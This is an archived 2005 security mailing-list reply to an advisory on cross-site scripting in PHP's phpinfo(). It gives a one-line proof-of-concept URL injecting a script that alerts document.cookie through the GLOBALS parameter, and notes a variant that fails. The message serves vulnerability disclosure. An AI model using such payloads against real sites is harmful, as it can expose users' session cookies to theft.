lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <200511031506.jA3F6D0W088824@mailserver2.hushmail.com> Date: Thu Nov 3 15:25:13 2005 From: phole at hushmail.com (phole@...hmail.com) Subject: Advisory 18/2005: PHP Cross Site Scripting (XSS)XVulnerability in phpinfo() -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 great Work PoC: phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script> this Don't Work: phpinfo.php?test=<script>alert(document.cookie);</script> -----BEGIN PGP SIGNATURE----- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.4 wkYEARECAAYFAkNqJ2EACgkQ3APBCuix8ZmWRACgs0IvvixY6zfmkpJ/9APUtgPLFfgA oJgOYQ4jbwGaTcJV95ZVyiAQwMXF =zYsZ -----END PGP SIGNATURE----- Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485